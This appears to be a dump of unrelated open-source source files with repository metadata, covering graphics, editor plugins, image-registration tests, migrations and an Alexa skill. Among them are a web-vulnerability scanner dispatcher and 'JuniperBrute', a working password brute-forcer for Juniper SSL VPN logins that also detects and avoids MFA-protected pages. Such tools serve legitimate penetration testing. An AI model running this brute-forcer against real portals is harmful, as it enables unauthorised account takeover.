        """Immediate-mode render: one glBegin/glEnd batch per face group."""
        vertices = self.vertices
        tex_coords = self.tex_coords
        normals = self.normals
        for face_group in self.face_groups:
            material = self.materials[face_group.material_name]
            glBindTexture(GL_TEXTURE_2D, material.texture_id)
            glBegin(GL_TRIANGLES)
            for vi, ti, ni in face_group.tri_indices:
                glTexCoord2fv( tex_coords[ti] )
                glNormal3fv( normals[ni] )
                glVertex3fv( vertices[vi] )
            glEnd()

    def draw_quick(self):
        """Render via a display list, compiling it on first use."""
        if self.display_list_id is None:
            self.display_list_id = glGenLists(1)
            glNewList(self.display_list_id, GL_COMPILE)
            self.draw()
            glEndList()
        glCallList(self.display_list_id)
|
MaxWayne/Beginning-Game-Development-with-Python-and-Pygame
|
Chapter 12/model3d.py
|
Python
|
mit
| 5,468
|
#
# FileLogger
#
# Copyright (c) Ryan Kadwell <ryan@riaka.ca>
#
# For the full copyright and license information, please view the LICENSE
# file that was distributed with this source code.
#
# Logs time based on what file is active in sublime. Logs are stored in:
# ${HOME}/.worklogs/[DATE]
#
# Author: Ryan Kadwell <ryan@riaka.ca>
#
import sublime_plugin
import time
import datetime
import os
class FileLogger(sublime_plugin.EventListener):
    """
    Keeps track of what files are being worked on at what times.
    This provides a blunt method for tracking time based on what files are
    being used through sublime text.
    """
    # Epoch timestamps bracketing the current view's focus period, plus the
    # last file already logged (to avoid duplicate consecutive rows).
    timestart = 0
    timeend = 0
    lastfile = ''

    def on_activated(self, view):
        """Record when a view gains focus."""
        self.timestart = time.time()

    def on_deactivated(self, view):
        """On focus loss, append a start/end/filename row to today's worklog."""
        self.timeend = time.time()
        if view.file_name() != self.lastfile and view.file_name() and self.timestart:
            # name the file after the start date
            file_name = datetime.datetime.fromtimestamp(self.timestart).strftime('%Y-%m-%d')
            start = datetime.datetime.fromtimestamp(self.timestart).strftime('%H:%M:%S')
            end = datetime.datetime.fromtimestamp(self.timeend).strftime('%H:%M:%S')
            directory = os.path.join(os.path.expanduser("~"), ".worklogs")
            if not os.path.exists(directory):
                os.makedirs(directory)
            # BUG FIX: the log file handle was never closed; a context manager
            # guarantees the row is flushed and the handle released.
            with open(os.path.join(directory, file_name), 'a+') as f:
                f.write(str(start) + "\t" + str(end) + "\t" + str(view.file_name()) + os.linesep)
            self.lastfile = view.file_name()
|
ryakad/sublime-filelogger
|
FileLogger.py
|
Python
|
mit
| 1,599
|
# -*- coding: utf-8 -*-
"""UiObject finder
:copyright: (c) 2015 by tksn
:license: MIT
"""
from __future__ import unicode_literals
import math
import sys
from phoneauto.scriptgenerator.exception import UiObjectNotFound
class UiObjectLocator(object):
    """Identifies a UI object on screen via filter criteria and an optional index."""

    def __init__(self, filters, index=None):
        """Create a locator.

        Args:
            filters (dict): Key-value pairs used as filter conditions to
                narrow down UI objects.
            index (int): Position within the list produced by applying the
                filters. Left as None when the filters alone are enough to
                identify a single object.
        """
        self._criteria = filters
        self._position = index
        self._metadata = None

    def set_meta(self, meta):
        """Attach meta information gathered during the search."""
        self._metadata = meta

    @property
    def meta(self):
        """Meta information acquired on search (None until set_meta is called)."""
        return self._metadata

    @property
    def filters(self):
        """Filter conditions used to identify the UI object."""
        return self._criteria

    @property
    def index(self):
        """Index into the filter results, or None when not needed."""
        return self._position
class UiObjectFinder(object):
    """Finder to spot a UI object for provided conditions"""

    # Objects whose center is farther than this (in pixels) from the query
    # point are ignored when ignore_distant is set.
    _FIND_OBJECT_DISTANCE_THRESH = 200

    def __init__(self, hierarchy_dump):
        """Initialize finder object
        Args:
            hierarchy_dump (object): UI hierarchy dump object
        """
        self._hierarchy_dump = hierarchy_dump

    def find_object_contains(self, coord, ignore_distant, **criteria):
        """Find an object whose rect contains the given coordinates and
        meets the given criteria.

        Args:
            coord (tuple): Coordinates (x, y)
            ignore_distant (bool):
                Boolean flag which specifies whether it ignores
                UI objects of which center are too far from coord.
            criteria (dict):
                Optional key-value pairs which filter search result
        Returns:
            locator object
        Raises:
            UiObjectNotFound: If there is no such object corresponding to
                the given coordinates and criteria.
        """
        # Find all objects which contain (x, y)
        objects_iter = self._find_objects_contains(
            coord, ignore_distant, **criteria)
        # Pick an object which has smallest area
        smallest = self._select_smallest_object(objects_iter)
        if smallest is None:
            raise UiObjectNotFound('({0}, {1})'.format(*coord))
        # Try finding filters which can uniquely identify an object
        locator = self._determine_locator(smallest['object'])
        # If failed, Use index in addition to filters
        locator = locator or UiObjectLocator(
            filters=criteria, index=smallest['index'])
        locator.set_meta(smallest['object'])
        return locator

    def _find_objects_contains(self, coord, ignore_distant, **criteria):
        """Find UI object of which rect contains coord"""
        # pylint: disable=invalid-name
        T, L, B, R = 'top', 'left', 'bottom', 'right'
        x, y = coord

        def xy_in_rect(r):
            """Check xy is in rect r"""
            if x < r[L] or r[R] <= x or y < r[T] or r[B] <= y:
                return False
            if ignore_distant:
                r_x, r_y = r[L] + (r[R] - r[L]) / 2, r[T] + (r[B] - r[T]) / 2
                distance = math.hypot(x - r_x, y - r_y)
                return distance < self._FIND_OBJECT_DISTANCE_THRESH
            return True

        objects = self._hierarchy_dump.find_objects(**criteria)
        for i, obj in enumerate(objects):
            if xy_in_rect(obj['visibleBounds']):
                yield (i, obj)

    @staticmethod
    def _select_smallest_object(object_enum):
        """Select the smallest UI object from a set of UI objects"""
        def rect_area(rect):
            """Returns area of rect"""
            return ((rect['bottom'] - rect['top']) *
                    (rect['right'] - rect['left']))
        # Sentinel compares greater than any real area via maxsize.
        min_obj = sentinel = (sys.maxsize, )
        for i, obj in object_enum:
            area = rect_area(obj['visibleBounds'])
            if area < min_obj[0]:
                min_obj = (area, i, obj)
        if min_obj is sentinel:
            return None
        return {'index': min_obj[1], 'object': min_obj[2]}

    def _determine_locator(self, info):
        """Determine locator which identifies one single UI object"""
        def unique(**criteria):
            """Check if given criteria finds single UI object"""
            objects = list(self._hierarchy_dump.find_objects(**criteria))
            return len(objects) == 1
        # uses resource_id if it's available and unique
        resource_id = info['resourceName']
        if resource_id and unique(resourceId=resource_id):
            return UiObjectLocator(filters={'resourceId': resource_id})
        # uses content-desc if it's available
        content_desc = info['contentDescription']
        if content_desc and unique(description=content_desc):
            return UiObjectLocator(filters={'description': content_desc})
        # uses text if it's available
        if info['text'] and unique(text=info['text']):
            return UiObjectLocator(filters={'text': info['text']})
        # uses class name if it's available
        class_name = info['className']
        if class_name and unique(className=class_name):
            return UiObjectLocator(filters={'className': class_name})
        return None
|
tksn/phoneauto
|
phoneauto/scriptgenerator/uiobjectfinder.py
|
Python
|
mit
| 5,775
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Spaghetti: Web Server Security Scanner
#
# @url: https://github.com/m4ll0k/Spaghetti
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'doc/LICENSE'
import AdminInterfaces
import AllowMethod
import ApacheUsers
import ApacheXss
import Backdoor
import Backup
import Captcha
import ClientAccessPolicy
import CommonDirectory
import CommonFile
import Cookie
import HtmlObject
import LDAPInjection
import ModStatus
import Email
import MultiIndex
import PrivateIP
import Robots
def All(url,agent,proxy,redirect):
    # Run every discovery module against the target, preserving the
    # original execution order.
    checks = (
        Cookie.Cookie,
        AllowMethod.AllowMethod,
        Robots.Robots,
        ClientAccessPolicy.ClientAccessPolicy,
        PrivateIP.PrivateIP,
        Email.Email,
        MultiIndex.MultiIndex,
        Captcha.Captcha,
        ApacheUsers.ApacheUsers,
        ApacheXss.ApacheXss,
        HtmlObject.HtmlObject,
        LDAPInjection.LDAPInjection,
        ModStatus.ModStatus,
        AdminInterfaces.AdminInterfaces,
        Backdoor.Backdoors,
        Backup.Backup,
        CommonDirectory.CommonDirectory,
        CommonFile.CommonFile,
    )
    for check in checks:
        check(url, agent, proxy, redirect).Run()
def AdminInterface(url,agent,proxy,redirect):
    # Run only the admin-interface discovery check.
    AdminInterfaces.AdminInterfaces(url,agent,proxy,redirect).Run()
def Misconfiguration(url,agent,proxy,redirect):
    # Checks for server misconfiguration and leftover/backup files,
    # run in the original order.
    for check in (MultiIndex.MultiIndex,
                  ModStatus.ModStatus,
                  Backdoor.Backdoors,
                  Backup.Backup,
                  CommonDirectory.CommonDirectory,
                  CommonFile.CommonFile):
        check(url, agent, proxy, redirect).Run()
def InfoDisclosure(url,agent,proxy,redirect):
    # Information-disclosure checks, run in the original order.
    for check in (Robots.Robots,
                  ClientAccessPolicy.ClientAccessPolicy,
                  PrivateIP.PrivateIP,
                  Email.Email):
        check(url, agent, proxy, redirect).Run()
|
Yukinoshita47/Yuki-Chan-The-Auto-Pentest
|
Module/Spaghetti/modules/discovery/All.py
|
Python
|
mit
| 2,310
|
# Development settings: start from the shared local settings and relax them.
from local import *

# Enable debug pages and offline mode for local development.
DEBUG = True
OFFLINE_MODE = True

# Requests from these addresses are treated as internal by Django
# (presumably for the debug toolbar -- confirm against INSTALLED_APPS).
INTERNAL_IPS = ('127.0.0.1',)

# Write outgoing email to files instead of actually sending it.
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = '/tmp/tola-messages'
|
open-build/TolaActivity
|
tola/settings/dev.py
|
Python
|
gpl-2.0
| 192
|
import numpy as np
import scipy as sp
import nibabel as nib
from numpy.testing import (assert_array_equal,
assert_array_almost_equal,
assert_almost_equal,
assert_equal)
from dipy.core import geometry as geometry
from dipy.data import get_data
from dipy.viz import regtools as rt
from dipy.align import floating
from dipy.align import vector_fields as vf
from dipy.align import imaffine
from dipy.align.transforms import (Transform,
regtransforms)
from dipy.align.tests.test_parzenhist import (setup_random_transform,
sample_domain_regular)
# For each transform type, select a transform factor (indicating how large the
# true transform between static and moving images will be), a sampling scheme
# (either a positive integer less than or equal to 100, or None) indicating
# the percentage (if int) of voxels to be used for estimating the joint PDFs,
# or dense sampling (if None), and also specify a starting point (to avoid
# starting from the identity)
# Tuple layout per entry: (transform factor, sampling percentage -- None
# means dense sampling, starting parameter vector).
factors = {('TRANSLATION', 2): (2.0, 0.35, np.array([2.3, 4.5])),
           ('ROTATION', 2): (0.1, None, np.array([0.1])),
           ('RIGID', 2): (0.1, .50, np.array([0.12, 1.8, 2.7])),
           ('SCALING', 2): (0.01, None, np.array([1.05])),
           ('AFFINE', 2): (0.1, .50, np.array([0.99, -0.05, 1.3, 0.05, 0.99, 2.5])),
           ('TRANSLATION', 3): (2.0, None, np.array([2.3, 4.5, 1.7])),
           ('ROTATION', 3): (0.1, 1.0, np.array([0.1, 0.15, -0.11])),
           ('RIGID', 3): (0.1, None, np.array([0.1, 0.15, -0.11, 2.3, 4.5, 1.7])),
           ('SCALING', 3): (0.1, .35, np.array([0.95])),
           ('AFFINE', 3): (0.1, None, np.array([0.99, -0.05, 0.03, 1.3,
                                                0.05, 0.99, -0.10, 2.5,
                                                -0.07, 0.10, 0.99, -1.4]))}
def test_align_centers_of_mass_3d():
    """Check that align_centers_of_mass translates the moving image's center
    of mass onto the static image's, under varied grid-to-world transforms."""
    np.random.seed(1246592)
    shape = (64, 64, 64)
    rm = 8
    sp = vf.create_sphere(shape[0]//2, shape[1]//2, shape[2]//2, rm)
    moving = np.zeros(shape)
    # The center of mass will be (16, 16, 16), in image coordinates
    moving[:shape[0]//2, :shape[1]//2, :shape[2]//2] = sp[...]
    rs = 16
    # The center of mass will be (32, 32, 32), in image coordinates
    static = vf.create_sphere(shape[0], shape[1], shape[2], rs)
    # Create arbitrary image-to-space transforms
    axis = np.array([.5, 2.0, 1.5])
    t = 0.15 #translation factor
    trans = np.array([[1, 0, 0, -t*shape[0]],
                      [0, 1, 0, -t*shape[1]],
                      [0, 0, 1, -t*shape[2]],
                      [0, 0, 0, 1]])
    trans_inv = np.linalg.inv(trans)
    for rotation_angle in [-1 * np.pi/6.0, 0.0, np.pi/5.0]:
        for scale_factor in [0.83, 1.3, 2.07]: #scale
            rot = np.zeros(shape=(4,4))
            rot[:3, :3] = geometry.rodrigues_axis_rotation(axis,
                                                           rotation_angle)
            rot[3,3] = 1.0
            scale = np.array([[1 * scale_factor, 0, 0, 0],
                              [0, 1 * scale_factor, 0, 0],
                              [0, 0, 1 * scale_factor, 0],
                              [0, 0, 0, 1]])
            static_grid2world = trans_inv.dot(scale.dot(rot.dot(trans)))
            moving_grid2world = np.linalg.inv(static_grid2world)
            # Expected translation: difference of the two world-space centers.
            c_static = static_grid2world.dot((32, 32, 32, 1))[:3]
            c_moving = moving_grid2world.dot((16, 16, 16, 1))[:3]
            expected = np.eye(4);
            expected[:3, 3] = c_moving - c_static
            # Implementation under test
            actual = imaffine.align_centers_of_mass(static, static_grid2world,
                                                    moving, moving_grid2world)
            assert_array_almost_equal(actual.affine, expected)
def test_align_geometric_centers_3d():
    """Check that align_geometric_centers maps the geometric (grid) center of
    the moving image onto the static one, across shapes and transforms."""
    # Create arbitrary image-to-space transforms
    axis = np.array([.5, 2.0, 1.5])
    t = 0.15 #translation factor
    for theta in [-1 * np.pi/6.0, 0.0, np.pi/5.0]: #rotation angle
        for s in [0.83, 1.3, 2.07]: #scale
            m_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
            for shape_moving in m_shapes:
                s_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
                for shape_static in s_shapes:
                    moving = np.ndarray(shape=shape_moving)
                    static = np.ndarray(shape=shape_static)
                    trans = np.array([[1, 0, 0, -t*shape_static[0]],
                                      [0, 1, 0, -t*shape_static[1]],
                                      [0, 0, 1, -t*shape_static[2]],
                                      [0, 0, 0, 1]])
                    trans_inv = np.linalg.inv(trans)
                    rot = np.zeros(shape=(4,4))
                    rot[:3, :3] = geometry.rodrigues_axis_rotation(axis, theta)
                    rot[3,3] = 1.0
                    scale = np.array([[1 * s, 0, 0, 0],
                                      [0, 1 * s, 0, 0],
                                      [0, 0, 1 * s, 0],
                                      [0, 0, 0, 1]])
                    static_grid2world = trans_inv.dot(scale.dot(rot.dot(trans)))
                    moving_grid2world = np.linalg.inv(static_grid2world)
                    # Expected translation: half-shape grid centers mapped to world space.
                    c_static = np.array(shape_static, dtype = np.float64) * 0.5
                    c_static = tuple(c_static)
                    c_static = static_grid2world.dot(c_static+(1,))[:3]
                    c_moving = np.array(shape_moving, dtype = np.float64) * 0.5
                    c_moving = tuple(c_moving)
                    c_moving = moving_grid2world.dot(c_moving+(1,))[:3]
                    expected = np.eye(4);
                    expected[:3, 3] = c_moving - c_static
                    # Implementation under test
                    actual = imaffine.align_geometric_centers(static,
                        static_grid2world, moving, moving_grid2world)
                    assert_array_almost_equal(actual.affine, expected)
def test_align_origins_3d():
    """Check that align_origins produces the translation between the two
    grid-to-world origins (last column of each affine)."""
    # Create arbitrary image-to-space transforms
    axis = np.array([.5, 2.0, 1.5])
    t = 0.15 #translation factor
    for theta in [-1 * np.pi/6.0, 0.0, np.pi/5.0]: #rotation angle
        for s in [0.83, 1.3, 2.07]: #scale
            m_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
            for shape_moving in m_shapes:
                s_shapes = [(256, 256, 128), (255, 255, 127), (64, 127, 142)]
                for shape_static in s_shapes:
                    moving = np.ndarray(shape=shape_moving)
                    static = np.ndarray(shape=shape_static)
                    trans = np.array([[1, 0, 0, -t*shape_static[0]],
                                      [0, 1, 0, -t*shape_static[1]],
                                      [0, 0, 1, -t*shape_static[2]],
                                      [0, 0, 0, 1]])
                    trans_inv = np.linalg.inv(trans)
                    rot = np.zeros(shape=(4,4))
                    rot[:3, :3] = geometry.rodrigues_axis_rotation(axis, theta)
                    rot[3,3] = 1.0
                    scale = np.array([[1*s, 0, 0, 0],
                                      [0, 1*s, 0, 0],
                                      [0, 0, 1*s, 0],
                                      [0, 0, 0, 1]])
                    static_grid2world = trans_inv.dot(scale.dot(rot.dot(trans)))
                    moving_grid2world = np.linalg.inv(static_grid2world)
                    # Expected translation: difference of the affines' origins.
                    c_static = static_grid2world[:3, 3]
                    c_moving = moving_grid2world[:3, 3]
                    expected = np.eye(4);
                    expected[:3, 3] = c_moving - c_static
                    # Implementation under test
                    actual = imaffine.align_origins(static, static_grid2world,
                                                    moving, moving_grid2world)
                    assert_array_almost_equal(actual.affine, expected)
def test_affreg_all_transforms():
    """Run MI-driven affine registration over every transform in `factors`
    and require >90% reduction of the initial sum of absolute differences."""
    # Test affine registration using all transforms with typical settings
    # Make sure dictionary entries are processed in the same order regardless of
    # the platform. Otherwise any random numbers drawn within the loop would make
    # the test non-deterministic even if we fix the seed before the loop.
    # Right now, this test does not draw any samples, but we still sort the entries
    # to prevent future related failures.
    for ttype in sorted(factors):
        dim = ttype[1]
        if dim == 2:
            nslices = 1
        else:
            nslices = 45
        factor = factors[ttype][0]
        sampling_pc = factors[ttype][1]
        transform = regtransforms[ttype]
        static, moving, static_grid2world, moving_grid2world, smask, mmask, T = \
            setup_random_transform(transform, factor, nslices, 1.0)
        # Sum of absolute differences
        start_sad = np.abs(static - moving).sum()
        metric = imaffine.MutualInformationMetric(32, sampling_pc)
        affreg = imaffine.AffineRegistration(metric,
                                             [10000, 1000, 100],
                                             [3, 1, 0],
                                             [4, 2, 1],
                                             'L-BFGS-B',
                                             None,
                                             options=None)
        x0 = transform.get_identity_parameters()
        affine_map = affreg.optimize(static, moving, transform, x0,
                                     static_grid2world, moving_grid2world)
        transformed = affine_map.transform(moving)
        # Sum of absolute differences
        end_sad = np.abs(static - transformed).sum()
        reduction = 1 - end_sad / start_sad
        print("%s>>%f"%(ttype, reduction))
        assert(reduction > 0.9)
def test_affreg_defaults():
    """Exercise AffineRegistration with all-default arguments and every
    supported `starting_affine` strategy on a 2D translation transform."""
    # Test all default arguments with an arbitrary transform
    # Select an arbitrary transform (all of them are already tested
    # in test_affreg_all_transforms)
    transform_name = 'TRANSLATION'
    dim = 2
    ttype = (transform_name, dim)
    for starting_affine in ['mass', 'voxel-origin', 'centers', None]:
        if dim == 2:
            nslices = 1
        else:
            nslices = 45
        factor = factors[ttype][0]
        sampling_pc = factors[ttype][1]
        transform = regtransforms[ttype]
        id_param = transform.get_identity_parameters()
        static, moving, static_grid2world, moving_grid2world, smask, mmask, T = \
            setup_random_transform(transform, factor, nslices, 1.0)
        # Sum of absolute differences
        start_sad = np.abs(static - moving).sum()
        # All None: force the defaults inside AffineRegistration/optimize.
        metric = None
        x0 = None
        sigmas = None
        scale_factors = None
        level_iters = None
        static_grid2world = None
        moving_grid2world = None
        for ss_sigma_factor in [1.0, None]:
            affreg = imaffine.AffineRegistration(metric,
                                                 level_iters,
                                                 sigmas,
                                                 scale_factors,
                                                 'L-BFGS-B',
                                                 ss_sigma_factor,
                                                 options=None)
            affine_map = affreg.optimize(static, moving, transform, x0,
                                         static_grid2world, moving_grid2world,
                                         starting_affine)
            transformed = affine_map.transform(moving)
            # Sum of absolute differences
            end_sad = np.abs(static - transformed).sum()
            reduction = 1 - end_sad / start_sad
            print("%s>>%f"%(ttype, reduction))
            assert(reduction > 0.9)
            # Also check the inverse mapping reduces the error symmetrically.
            transformed_inv = affine_map.transform_inverse(static)
            # Sum of absolute differences
            end_sad = np.abs(moving - transformed_inv).sum()
            reduction = 1 - end_sad / start_sad
            print("%s>>%f"%(ttype, reduction))
            assert(reduction > 0.9)
def test_mi_gradient():
    """Compare the analytic mutual-information gradient against a forward
    finite-difference approximation (cosine similarity must exceed 0.99)."""
    np.random.seed(2022966)
    # Test the gradient of mutual information
    h = 1e-5
    # Make sure dictionary entries are processed in the same order regardless of
    # the platform. Otherwise any random numbers drawn within the loop would make
    # the test non-deterministic even if we fix the seed before the loop:
    # in this case the samples are drawn with `np.random.randn` below
    for ttype in sorted(factors):
        transform = regtransforms[ttype]
        dim = ttype[1]
        if dim == 2:
            nslices = 1
        else:
            nslices = 45
        factor = factors[ttype][0]
        sampling_proportion = factors[ttype][1]
        theta = factors[ttype][2]
        # Start from a small rotation
        start = regtransforms[('ROTATION', dim)]
        nrot = start.get_number_of_parameters()
        starting_affine = start.param_to_matrix(0.25 * np.random.randn(nrot))
        # Get data (pair of images related to each other by an known transform)
        static, moving, static_g2w, moving_g2w, smask, mmask, M = \
            setup_random_transform(transform, factor, nslices, 2.0)
        # Prepare a MutualInformationMetric instance
        mi_metric = imaffine.MutualInformationMetric(32, sampling_proportion)
        mi_metric.setup(transform, static, moving, starting_affine=starting_affine)
        # Compute the gradient with the implementation under test
        actual = mi_metric.gradient(theta)
        # Compute the gradient using finite-diferences
        n = transform.get_number_of_parameters()
        expected = np.empty(n, dtype=np.float64)
        val0 = mi_metric.distance(theta)
        for i in range(n):
            dtheta = theta.copy()
            dtheta[i] += h
            val1 = mi_metric.distance(dtheta)
            expected[i] = (val1 - val0) / h
        # Normalized dot product == cosine of the angle between the gradients.
        dp = expected.dot(actual)
        enorm = np.linalg.norm(expected)
        anorm = np.linalg.norm(actual)
        nprod = dp / (enorm * anorm)
        assert(nprod >= 0.99)
|
jyeatman/dipy
|
dipy/align/tests/test_imaffine.py
|
Python
|
bsd-3-clause
| 14,486
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""add ti job_id index
Revision ID: 947454bf1dff
Revises: bdaa763e6c56
Create Date: 2017-08-15 15:12:13.845074
"""
from alembic import op
# revision identifiers, used by Alembic.
revision = '947454bf1dff'
down_revision = 'bdaa763e6c56'
branch_labels = None
depends_on = None
def upgrade():
    """Create the non-unique ``ti_job_id`` index on ``task_instance.job_id``."""
    index_name = 'ti_job_id'
    op.create_index(index_name, 'task_instance', ['job_id'], unique=False)
def downgrade():
    """Drop the ``ti_job_id`` index from ``task_instance``."""
    index_name = 'ti_job_id'
    op.drop_index(index_name, table_name='task_instance')
|
sid88in/incubator-airflow
|
airflow/migrations/versions/947454bf1dff_add_ti_job_id_index.py
|
Python
|
apache-2.0
| 1,261
|
#! /usr/bin/python
# Created by Kirk Hayes (l0gan) @kirkphayes
# Part of myBFF
import random
import re
import time
from argparse import ArgumentParser

import requests
from requests import session

from core.webModule import webModule
class JuniperBrute(webModule):
    """Brute-force login module for Juniper/Pulse Secure SSL VPN portals.

    The portal is fingerprinted by its characteristic ``/dana-na/`` URL path.
    The module enumerates alternate sign-in pages, skips pages that appear to
    require multi-factor authentication, and then submits username/password
    combinations from the configured wordlists.
    """

    def __init__(self, config, display, lock):
        super(JuniperBrute, self).__init__(config, display, lock)
        self.fingerprint = "dana-na"
        self.response = "Success"
        self.protocol = "web"
        # POST fields that carry no credential data.
        self.ignore = ['tz_offset', 'btnSubmit']
        # Instance state.  These were previously class-level lists, which
        # would have been shared (and appended to) across every instance.
        self.URLS = []        # discovered alternate sign-in page names
        self.nomfaurls = []   # sign-in pages that do NOT require MFA

    def urlCheck(self, config, c, URL):
        """Probe /dana-na/auth/url_1 .. url_19 for additional sign-in pages.

        Any page that answers 200 is recorded in ``self.URLS``.
        """
        print("[!] Checking for other logon pages...")
        for n in range(1, 20):
            URL = 'url_' + str(n)
            u = c.get(config["HOST"] + '/dana-na/auth/' + URL + '/welcome.cgi', allow_redirects=False, verify=False)
            if u.status_code == 200:
                self.URLS.append(URL)

    def MFACheck(self, c, config, URL):
        """Return True when the sign-in page at *URL* appears to demand MFA.

        Heuristics: more than three password-type inputs in the login form,
        or a 'Missing certificate' message.  Pages without MFA are remembered
        in ``self.nomfaurls``.
        """
        print("[!] Checking to see if MultiFactor Authentication is required for " + URL + "...")
        # BUG FIX: the original passed proxies=proxy, but no ``proxy`` name
        # exists anywhere in this module, so the call raised NameError.
        mfa = c.get(config["HOST"] + '/dana-na/auth/' + URL + '/welcome.cgi', allow_redirects=False, verify=False)
        m = re.findall('<input (.*?)>', mfa.text, re.DOTALL)
        n = re.findall('password', str(m))
        o = re.search('Missing certificate', mfa.text)
        if n.count("password") > 3:
            print("[-] MultiFactor Authentication Required for " + URL + "!")
            return True
        elif o:
            print("[-] MultiFactor Authentication Required for " + URL + "!")
            return True
        else:
            print("[+] MultiFactor Authentication is not on. Continuing...")
            self.nomfaurls.append(URL)
            return False

    def connectTest(self, config, payload, URL=None):
        """POST *payload* to a non-MFA login page and report success/failure.

        *URL* now defaults to None (backward compatible): every internal
        caller omitted it, which raised TypeError with the old required
        parameter.  The value is recomputed from ``self.nomfaurls`` anyway.
        """
        # BUG FIX: removed the dead line ``payoad = self.payload(config)``
        # (misspelled, unused, and it re-ran the whole enumeration, creating
        # mutual recursion between payload() and connectTest()).
        with session() as c:
            requests.packages.urllib3.disable_warnings()
            if 'url_default' in self.nomfaurls:
                URL = 'url_default'
            else:
                URL = self.nomfaurls[0]
            # BUG FIX: dropped the undefined ``proxies=proxy`` argument here too.
            cpost = c.post(config["HOST"] + '/dana-na/auth/' + URL + '/login.cgi', data=payload, allow_redirects=False, verify=False)
            m = re.search('p=user-confirm', str(cpost.headers))
            if m:
                print("[+] User Credentials Successful: " + config["USERNAME"] + ":" + config["PASSWORD"])
            else:
                print("[-] Login Failed for: " + config["USERNAME"] + ":" + config["PASSWORD"])

    def _build_payload(self, config, realm):
        """Assemble the login form fields for the current credentials."""
        return {
            'tz_offset': '-360',
            'username': config["USERNAME"],
            'password': config["PASSWORD"],
            'realm': realm,
            'btnSubmit': 'Sign+In'
        }

    def payload(self, config):
        """Discover realms/pages and drive the brute-force loop.

        Returns the first payload built when both a user file and a password
        file are supplied (matching the original behaviour of returning
        without testing it), otherwise tests credentials inline and returns
        None.  Returns None when every page requires MFA.
        """
        with session() as c:
            requests.packages.urllib3.disable_warnings()
            cget = c.get(config["HOST"] + '/dana-na/auth/welcome.cgi', allow_redirects=True, verify=False)
            if cget.cookies:
                URL = cget.cookies['DSSIGNIN']
            else:
                URL = "url_default"
            m = re.findall("<select id=(.*?)select>", cget.text, re.DOTALL)
            n = re.findall("<option(.*?)>(.*?)</option>", str(m), re.DOTALL)
            if n:
                print("[!] The following realms are available: ")
                for o in n:
                    print("[+] " + o[1])
                    realm = o[1]  # the last listed realm is the one used
            else:
                print("[+] No realms available...")
                realm = ""
            # If the default page demands MFA, look for alternates that do not.
            MFAused = self.MFACheck(c, config, URL)
            if MFAused:
                self.urlCheck(config, c, URL)
                for URL in self.URLS:
                    self.MFACheck(c, config, URL)
            else:
                self.nomfaurls.append('url_default')
            if not self.nomfaurls:
                print("[-] All pages require MFA. Aborting...")
                return None
            if config["PASS_FILE"]:
                # BUG FIX: wordlist files are now closed via ``with``.
                with open(config["PASS_FILE"]) as pf:
                    pass_lines = [pass_line.rstrip('\n') for pass_line in pf]
                for pass_line in pass_lines:
                    if config["UserFile"]:
                        with open(config["UserFile"]) as uf:
                            lines = [line.rstrip('\n') for line in uf]
                        for line in lines:
                            config["USERNAME"] = line.strip('\n')
                            config["PASSWORD"] = pass_line.strip('\n')
                            # Original behaviour preserved: return the first
                            # payload without testing it.  (The original's
                            # time.sleep after this return was unreachable
                            # and has been removed.)
                            return self._build_payload(config, realm)
                    else:
                        config["PASSWORD"] = pass_line.strip('\n')
                        self.connectTest(config, self._build_payload(config, realm))
                        time.sleep(config["timeout"])
            elif config["UserFile"]:
                with open(config["UserFile"]) as uf:
                    lines = [line.rstrip('\n') for line in uf]
                for line in lines:
                    config["USERNAME"] = line.strip('\n')
                    self.connectTest(config, self._build_payload(config, realm))
            else:
                self.connectTest(config, self._build_payload(config, realm))
|
MooseDojo/myBFF
|
modules/JuniperBrute.py
|
Python
|
mit
| 6,490
|
"""Add Brief.is_a_copy boolean, default False, nullable False
Revision ID: 890
Revises: 880
Create Date: 2017-06-01 11:24:53.346954
"""
# revision identifiers, used by Alembic.
revision = '900'
down_revision = '890'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Add the non-nullable ``is_a_copy`` flag to ``briefs`` (defaults to false)."""
    is_a_copy = sa.Column('is_a_copy', sa.Boolean(), server_default=sa.text(u'false'), nullable=False)
    op.add_column('briefs', is_a_copy)
def downgrade():
    """Remove the ``is_a_copy`` column from ``briefs``."""
    table, column_name = 'briefs', 'is_a_copy'
    op.drop_column(table, column_name)
|
alphagov/digitalmarketplace-api
|
migrations/versions/900_add_brief_is_a_copy.py
|
Python
|
mit
| 461
|
import logging
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import random
app = Flask(__name__)
# Serve the Alexa skill endpoint at the web root.
ask = Ask(app, "/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
@ask.launch
def welcome():
    """Start a new memory-matching game.

    Builds a shuffled deck containing each animal twice, stores the deck and
    the list of not-yet-matched animals in the Alexa session, and asks the
    opening question.
    """
    # BUG FIX: 'cammel' -> 'camel', so the card name is spelled correctly
    # when spoken back to the player.  (The matching logic only compares
    # deck entries against each other, so this is safe.)
    animals = ['cat', 'dog', 'camel', 'bird', 'horse']
    # NOTE: the session key 'not_machted' is misspelled, but the same
    # spelling is read elsewhere in this file, so it is kept as-is.
    session.attributes['not_machted'] = animals
    answer = list(animals)
    answer += answer
    random.shuffle(answer)
    session.attributes['answer'] = answer
    session.attributes['number_one'] = None
    msg = render_template('welcome')
    return question(msg)
@ask.intent("NumberIntent", convert={'number':int})
def next(number):
answer = session.attributes['answer']
number_one = session.attributes['number_one']
if number_one is None:
session.attributes['number_one'] = number
msg = render_template('next', number = number, animal = answer[number])
else:
if number == number_one:
msg = render_template('same')
else:
session.attributes['number_one'] = None
print(answer)
if answer[number] == answer[number_one]:
